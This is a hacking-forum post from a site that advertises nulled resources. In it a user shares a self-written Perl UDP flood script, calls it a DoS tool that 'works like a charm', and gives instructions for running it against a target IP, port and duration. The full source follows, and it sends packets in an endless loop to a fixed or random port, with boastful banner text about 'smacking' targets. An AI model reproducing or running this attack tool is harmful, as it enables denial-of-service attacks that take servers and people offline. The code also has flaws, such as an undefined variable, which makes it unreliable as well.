Leak Society - The Home Of Nulled Resources.
Forum Beta v1 Now Live!
Perl Dos script (Coded by me)
Thead Owner : Syncing, Category : Everything Coding, 0 Comment, 19 Read
Viewers: 1 Guest(s)
Junior Member
**
9
Messages
6
Threads
0
Rep
4 Years of Service
03-13-2014, 05:03 PM
#1
Here is a custom perl dos script me / #TeamDNS made hope you like it works like a charm

in order to use save script below as "dns" don't put 'pl' at the end

run this command to work it: perl dns ip port time

Code:
use Socket;


$ARGC=@ARGV;



if ($ARGC !=3) {

printf "To initiate a UDP Attack\n";

printf "perl $0 ip port time\n";

printf "Coded by zSyncing\n";

printf "#TeamDNS\n";

exit(1);

}


my ($ip,$port,$size,$time);

$ip=$ARGV[0];

$port= 3074;

$time=$ARGV[2];
socket(crazy, PF_INET, SOCK_DGRAM, 17);

$iaddr = inet_aton("$ip");



printf "

         Don't Tap them Smack Them
           @akaSync == zSyncing
                 #TeamDNS
           Corpsey Run that Bitch


        
";




if ($ARGV[1] ==0 && $ARGV[2] ==0) {

goto randpackets;
}

if ($ARGV[1] !=0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto packets;

}

if ($ARGV[1] !=0 && $ARGV[2] ==0) {

goto packets;

}

if ($ARGV[1] ==0 && $ARGV[2] !=0) {

system("(sleep $time;killall -9 udp) &");

goto randpackets;

}


packets:
for (;;) {

$size=$rand x $rand x $rand;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));

}


randpackets:
for (;;) {

$size=$rand x $rand x $rand;

$port=int(rand 65555) +1;

send(crazy, 0, $size, sockaddr_in($port, $iaddr));




}


Forum Jump: